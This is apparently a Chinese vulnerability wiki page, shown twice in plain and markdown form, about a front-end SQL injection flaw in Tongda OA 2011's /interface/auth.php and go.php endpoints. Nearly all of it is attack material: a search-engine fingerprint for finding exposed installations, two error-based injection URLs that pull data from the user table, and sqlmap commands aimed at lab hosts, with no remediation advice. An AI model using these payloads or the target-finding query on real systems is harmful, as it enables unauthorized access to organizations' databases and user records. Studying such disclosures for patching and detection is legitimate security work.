fofamini-wiki

登录白背景

源码

通达OA interface存在前台SQL注入漏洞

一、漏洞简介

通达OA（Office Anywhere网络智能办公系统）是由北京通达信科科技有限公司自主研发的协同办公自动化软件，是与中国企业管理实践相结合形成的综合管理办公平台。通达OA为各行业不同规模的众多用户提供信息化管理能力，包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等，帮助广大用户降低沟通和管理成本，提升生产和决策效率。通达OA /interface/auth.php 存在SQL注入漏洞,攻击者通过漏洞可以获取数据库信息。

二、影响版本

通达OA2011

三、资产测绘

hunterapp.name="通达 OA"
特征

四、漏洞复现

poc1

/interface/auth.php?PASSWORD=1&USER_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20user%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23

sqlmap

sqlmap -u "http://192.168.31.164/interface/auth.php?PASSWORD=1&USER_ID=%df%27%20" --batch --is-dba

poc2

http://192.168.43.219/interface/go.php?PASSWORD=1&USER_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20user%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23

sqlmap

sqlmap -u "http://192.168.43.219/interface/go.php?PASSWORD=1&USER_ID=%df%27%20" --batch

原文: https://www.yuque.com/xiaokp7/ocvun2/zls7e9sgclxv755n

# 通达OA interface存在前台SQL注入漏洞

# 一、漏洞简介
通达OA（Office Anywhere网络智能办公系统）是由北京通达信科科技有限公司自主研发的协同办公自动化软件，是与中国企业管理实践相结合形成的综合管理办公平台。通达OA为各行业不同规模的众多用户提供信息化管理能力，包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等，帮助广大用户降低沟通和管理成本，提升生产和决策效率。通达OA /interface/auth.php 存在SQL注入漏洞,攻击者通过漏洞可以获取数据库信息。

# 二、影响版本

- 通达OA2011

# 三、资产测绘

- hunter`app.name="通达 OA"`
- 特征

![image.png](./img/w5FpZR0OJ4GPngX6/1694870829657-63e4515a-b222-49fe-a8a1-54bcc9cc1af3-694505.png)

# 四、漏洞复现
poc1
```
/interface/auth.php?PASSWORD=1&USER_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20user%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
```
![image.png](./img/w5FpZR0OJ4GPngX6/1697129861345-a8c3dad8-c513-47ff-83d3-b3b0a75fb634-536761.png)
sqlmap
```
sqlmap -u "http://192.168.31.164/interface/auth.php?PASSWORD=1&USER_ID=%df%27%20" --batch --is-dba
```
![image.png](./img/w5FpZR0OJ4GPngX6/1697129905130-137c955d-3d25-4b37-8bf6-eb16dff2bbea-300932.png)
poc2
```
http://192.168.43.219/interface/go.php?PASSWORD=1&USER_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20user%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
```
![image.png](./img/w5FpZR0OJ4GPngX6/1702222554085-25f50549-dd87-403d-87a3-7ac9cbf11219-330189.png)
sqlmap
```
sqlmap -u "http://192.168.43.219/interface/go.php?PASSWORD=1&USER_ID=%df%27%20" --batch
```
![image.png](./img/w5FpZR0OJ4GPngX6/1702222578820-daa3b5d9-c3dc-4ef2-923d-dba5af2b9ceb-244610.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zls7e9sgclxv755n>